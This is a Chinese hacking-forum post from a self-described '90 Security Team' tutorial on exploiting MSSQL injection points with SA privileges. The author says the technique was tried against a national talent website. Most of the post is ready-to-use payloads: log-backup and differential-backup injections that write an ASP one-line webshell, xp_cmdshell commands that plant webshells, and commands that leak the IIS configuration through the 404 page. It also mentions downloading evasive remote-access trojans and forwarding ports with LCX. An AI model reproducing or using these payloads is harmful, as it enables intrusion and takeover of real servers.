找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2514|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
2 m: a, ~& d- w1 C) r5 I% p
+ I" o9 K- o- c& V* z: ]; ]0 h% [7 ~( l: @) R' o5 q& W: t8 [  D
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。: K( a- _$ b3 ~

2 E( B+ I/ X+ o" }5 B$ y' M$ J                                                                 ! d' H/ t% G+ c' B. [+ r
                                                                 & A# n) ^; z) ]+ o
                                                                  论坛: http://www.90team.net/
7 R, d, U7 x) _& s6 f3 g( ~2 P1 r& z! k% `
! ?1 n7 f& r' R) \" i

" a: ~8 u6 t3 t. x9 z友情检测国家人才网# m8 G5 |5 D" X3 i

7 g+ _0 m0 T2 J5 {0 I# `
5 {7 N) r* E( W$ R; m6 h$ ~! j1 Y# e$ P内容:MSSQL注入SA权限不显错模式下的入侵( y" J' s' e7 T8 i* v

: i2 D% Q$ h$ {
2 K$ u3 l8 H6 A& J2 u8 L9 l. R6 M一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
0 h' L/ A5 K4 n$ U; g
% b& S7 K, G' N* Y我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
5 g/ j3 Z- c! I2 E% s6 D* ~- E# l
* t2 d0 c% L+ B" w
0 M; H8 h* \/ G这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。7 Q5 O3 U) w; x9 p
0 D' N% Z+ J5 t1 a
思路:
9 a) ?% K  c/ u1 N( t0 [7 O
5 u& Q: W; ~2 |( @首先:
" _9 T0 [+ ?! t6 u3 C( Z6 B# k
. l8 @& |/ |; [  R1 r通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。) r! |, D0 @0 I* x/ @9 |& Z

" Y& N  V% Q) P' m) ]' M4 p* @1.日志备份获得Webshell2 S8 G$ W6 I5 G9 b- [5 h7 l- |
) E* w7 e" e' K, N( z
2.数据库差异备份获得Webshell1 D- E  X8 ]  I
9 H* H- X' @. U) }6 b+ O
4.直接下载免杀远控木马。
8 n" h( T! ^% n, j. D7 F- U7 S; t5 Q$ ?& J: {
5.直接下载LCX将服务器端口转发出来, Y" m0 {! T% V- b
5 Q* F* n$ A% a* Q! u* z
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。' E% t' m0 o3 i# N

1 p# K9 e' c) }7 o. X2 Z3 K  A5 O) M8 S0 j& G- y& {

5 j; a$ F/ W1 |. b/ t! H; v8 Y; j4 z( `在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, / s) F4 |: h; v
; m5 q$ T# d( t& G9 R8 S/ P
我直接演示后面一个方法( J+ E; R3 E8 H0 R7 x  R5 b9 g
, J4 Z: Z* n1 _

+ A. ^$ H" n, C! e! e1 u! e分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL * V- J1 z8 u0 }9 |7 p

8 |4 ~9 F, K- p# B
. X( ^  ?9 {7 p, Q9 r6 W5 h. U. }7 o: m( S$ z* g' l6 H$ {4 z% o
/ ?5 l* u! a! y. B" o
◆日志备份:: E! G7 A1 v- M) H& t

) n8 Z- T* D8 Y+ n" b6 ?* M! @
% S4 m( s2 h- W7 S9 A- Q" H1. 进行初始备份; Q# o+ e& _/ s/ ~. {$ `# ~
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
6 d* m, z/ c- h' U6 O: v  [! }) v4 @2 p3 s6 t
2. 插入数据+ ~+ g; a: X# ~
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
  Y. W" o: G1 A5 o6 J6 A4 W, p; b
0 H0 x* [& U# L0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>; x9 I( K1 x7 Z/ E
  % N! ~/ H5 n. v5 |8 q
3. 备份并获得文件,删除临时表; U. b2 ], d$ ?/ P: S
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--7 x8 B( l4 f, b. }
; N/ C+ L! ~# E( [* n$ p/ t0 U

/ y3 O2 f( Y2 t% j7 e. K* E% h6 I( m8 H0 }
◆数据库差异备份% W8 ]; p% D( b, y! z% s

% w; |: d5 m# u7 K- \(1. 进行差异备份准备工作$ Y3 e" W6 \; R  y! q/ v  H

2 C4 y) L/ ]  m: `1 w+ [& J; A$ Y;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--9 v8 ^$ R2 y4 R2 I7 e

  R4 Z. s" S! J# N% K' \上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
/ Y( I4 a- ]" j: H$ k3 ~
: V, w  @) A  N+ m3 N
3 l5 ?+ F2 @8 i) g6 t* V(2. 将数据写入到数据库8 G2 S! W0 \# G+ Q+ d7 [6 o1 H# @
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- & ~" }' u, @8 ]8 D7 E6 @: v: g, C; C3 z
/ `% ~+ e0 f4 H! d7 \. y
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>% m6 i3 Q) {$ r6 x. }, f

" d4 c* s6 d3 H9 |3. 备份数据库并清理临时文件$ `' S! n+ x" D# I- O& W" V

4 M6 U5 s9 O& @6 |3 \;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--6 t$ P1 [% S& ]* i
. R4 S" b: j+ W- d' I0 V+ ]+ i
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 ; v# L' n7 u7 \$ A9 k+ \: g6 g

. I) i! K$ ?; S! G
2 y! `* {7 q  D7 C: L& Z9 V# n5 f
, E0 R8 w* x. x( x; r7 [4 j1 U1 G用^转义字符来写ASP(一句话木马)文件的方法:   
. i& ]3 Z) t4 @- a# K4 e% I& i' _( _4 {% W
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
! s3 U4 P( A2 d4 M8 e% y. S  ~0 [3 M- E8 K( Y! _# [5 Q
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
6 x6 l( O2 I) H+ c0 M* `$ F& ?0 \- L! |/ l$ S9 Y/ [& [. y+ f0 C! ?" j
读取IIS配置信息获取web路径
+ F5 D8 ^; @/ s$ r- `
- L5 o; }9 d2 K6 `/ v& v     % Y; J; A5 L1 ?% @
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
4 O/ k1 R0 E# t1 G; O0 g& m7 G
- p; R0 C( R: Z% d执行命令
1 L/ C6 j4 Z8 |6 c1 d/ H5 X6 w% A     
3 R* o- ]1 D- t0 _; b     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--8 w( d, j! [9 ]1 Y* h- f
6 u$ v8 s  A# A  R4 c% F% f

9 b- |/ H% C4 C" L
  d+ M; z9 x9 O  C# C: Y4 s" j! |" X% k- f
( K5 E# n9 p  K5 `7 T) C# W
+ v3 [5 |8 z! x; a: C' M

1 ~0 B/ B% w0 ^: u4 ^# D" c+ b9 r( H0 `; C

( ^* }. P1 T6 J
3 Z- m' J5 Y8 c& u' w: u
0 l5 E1 t: C  z% r9 v( a( V' n6 `
1 b  [0 }6 N/ D: x9 n$ E/ C. k& ~4 a. m6 @$ c4 q, p
& G7 c. |8 t: ^
+ y9 G% P8 x( o& x; q1 h

' L1 W, i+ t  z5 q
0 D4 x4 ]# J, M/ X) T8 T# |0 E: q' c# v
* u$ f0 E* C" T/ @8 \0 m0 A& D2 d) [

3 f) s2 M: q4 u" J
2 p+ o6 h, U0 w% n2 ?' w; k9 h% e. x

2 B( K* j& H1 O. U6 C
; \" ^: B: m! i& W1 G. i
( C3 o1 W& m. v& B  w1 f5 D- ]. \2 y  I* a) f; T& _
4 P- l7 p. _7 g9 l

% O) p4 L2 p: J- t, I0 j3 S! q& x  W' c$ m3 x9 Q  ?
' a% F' g0 G5 }/ N6 e5 Q

. M- J1 s) d$ e
; i$ R, H" V, {- J5 k( z$ x7 m2 C* w: }$ f- H1 ^

0 S( Q' z5 X. f# G( p) s
: j7 v2 y! U% o. U$ V
" Q+ F- Z8 B( Q! h/ T4 @
& z; S, Z( `& U+ j/ U- }9 y' z7 U
* v. q  I6 X1 d" E7 S2 r6 v1 m& I0 P

$ v$ y& @, d- a2 l# Y: e
, ^' ~# a# ]1 X* R: A( m1 G8 _) T! V& `4 M( f/ f; E. }

! K. j/ _" ^1 Z' [
/ O' a( K5 }. ]; C
/ F. H1 h+ o# o! v; W! i6 h/ w8 v7 t5 \: B2 o3 m

/ X6 _2 ?" U1 O6 {# }7 h! L
2 p8 V5 c' J0 {
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表